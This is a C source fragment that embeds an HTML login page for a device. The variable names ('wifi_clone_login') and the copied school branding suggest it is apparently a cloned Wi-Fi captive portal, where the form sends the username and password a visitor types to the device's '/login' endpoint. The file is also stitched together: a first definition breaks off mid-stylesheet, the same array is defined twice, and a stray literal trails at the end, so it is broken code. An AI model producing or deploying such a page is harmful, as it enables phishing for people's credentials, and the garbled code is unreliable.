// Embedded login page: header (head+style)
const char wifi_clone_login_header_html[] = 
"<!DOCTYPE html>\n"
"<html lang=\"id\">\n"
"<head>\n"
"    <meta charset=\"UTF-8\">\n"
"    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n"
"    <title>LCP Sekolahan - Login</title>\n"
"    <style>\n"
"        * {\n"
"            margin: 0;\n"
"            padding: 0;\n"
"            box-sizing: border-box;\n"
"        }\n"
"\n"
"        body {\n"
"            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\n"
"            background: linear-gradient(135deg, #f0f0f0 0%, #e8e8e8 100%);\n"
"            background-attachment: fixed;\n"
"            min-height: 100vh;\n"
"            display: flex;\n"
"            flex-direction: column;\n"
"            justify-content: center;\n"
"            align-items: center;\n"
"            padding: 20px;\n"
"        }\n"
"\n"
"        .login-container {\n"
"            background: rgba(255, 255, 255, 0.75);\n"
"            backdrop-filter: blur(10px);\n"
"            border-radius: 20px;\n"
"            box-shadow: 0 20px 60px rgba(0, 0, 0, 0.15);\n"
// Clean embedded login page (full HTML stored in one header string)
const char wifi_clone_login_header_html[] = 
"<!doctype html>\n"
"<html lang=\"id\">\n"
"<head>\n"
"  <meta charset=\"utf-8\">\n"
"  <meta name=\"viewport\" content=\"width=device-width,initial-scale=1\">\n"
"  <title>Login</title>\n"
"  <style>\n"
"    *{box-sizing:border-box;margin:0;padding:0}\n"
"    html,body{height:100%}\n"
"    body{font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;background-color:#f6f6f6;background-image:repeating-linear-gradient(0deg, rgba(0,0,0,0.03) 0 1px, transparent 1px 18px),repeating-linear-gradient(90deg, rgba(0,0,0,0.03) 0 1px, transparent 1px 18px);display:flex;align-items:center;justify-content:center;min-height:100vh;padding:24px}\n"
"    .login-container{width:100%;max-width:420px;background:rgba(255,255,255,0.95);border-radius:14px;padding:36px 30px;box-shadow:0 18px 40px rgba(0,0,0,0.12);text-align:center}\n"
"    .logo-placeholder{width:220px;height:220px;margin:0 auto 22px;background:#efefef;border:12px solid #fff;border-radius:8px;display:flex;align-items:center;justify-content:center;box-shadow:0 8px 30px rgba(0,0,0,0.12) inset,0 6px 18px rgba(0,0,0,0.08)}\n"
"    .logo-placeholder img{max-width:100%;max-height:100%;object-fit:contain}\n"
"    .form-group{margin-bottom:16px}\n"
"    .input-box{border:1px solid #d7d7d7;border-radius:6px;background:#fff;overflow:hidden}\n"
"    input[type=text],input[type=password]{width:100%;padding:14px 16px;border:0;outline:0;font-size:16px}\n"
"    input::placeholder{color:#666;font-family:Georgia, 'Times New Roman', Times, serif;font-size:15px}\n"
"    .login-btn{width:100%;padding:14px 20px;background:#45c6cf;color:#fff;border:0;border-radius:8px;font-weight:700;cursor:pointer;box-shadow:0 6px 0 rgba(0,0,0,0.06);text-shadow:0 1px 0 rgba(0,0,0,0.15)}\n"
"    .login-btn:hover{transform:translateY(-2px);box-shadow:0 10px 20px rgba(69,198,207,0.18)}\n"
"    .footer{position:fixed;left:0;right:0;bottom:10px;text-align:center;color:#000;font-size:16px;font-weight:700;text-shadow:0 3px 0 rgba(255,255,255,0.95),0 2px 3px rgba(0,0,0,0.25)}\n"
"    @media(max-width:480px){.logo-placeholder{width:180px;height:180px}.login-container{padding:28px 20px}}\n"
"  </style>\n"
"</head>\n"
"<body>\n"
"  <div class=\"login-container\">\n"
"    <div class=\"logo-placeholder\">\n"
"      <img id=\"logoImg\" src=\"\" alt=\"Logo\" style=\"display:block\">\n"
"    </div>\n"
"\n"
"    <form id=\"loginForm\" style=\"max-width:320px;margin:0 auto\">\n"
"      <div class=\"form-group\">\n"
"        <div class=\"input-box\">\n"
"          <input type=\"text\" id=\"username\" placeholder=\"Username\" autocomplete=\"username\" required>\n"
"        </div>\n"
"      </div>\n"
"      <div class=\"form-group\">\n"
"        <div class=\"input-box\">\n"
"          <input type=\"password\" id=\"password\" placeholder=\"Password\" autocomplete=\"current-password\" required>\n"
"        </div>\n"
"      </div>\n"
"      <button type=\"submit\" class=\"login-btn\">LOGIN</button>\n"
"    </form>\n"
"  </div>\n"
"\n"
"  <footer class=\"footer\">Copyright © 2017 Perguruan Diponegoro</footer>\n"
"\n"
"  <script>\n"
"    // Minimal JS for device: replace or extend in firmware as needed\n"
"    (function(){\n"
"      var form = document.getElementById('loginForm');\n"
"      if(form) form.addEventListener('submit', function(e){ e.preventDefault(); var u=document.getElementById('username').value; var p=document.getElementById('password').value;\n"
"        // send to device login endpoint if available\n"
"        try{ fetch('/login',{method:'POST',headers:{'Content-Type':'application/json'},body:JSON.stringify({username:u,password:p})}).then(r=>r.json()).then(()=>{ /* device will redirect */ }).catch(()=>{}); }catch(e){} });\n"
"    })();\n"
"  </script>\n"
"</body>\n"
"</html>\n";

// keep body string empty (server expects two pieces in some code paths)
const char wifi_clone_login_body_html[] = "";
"\n"

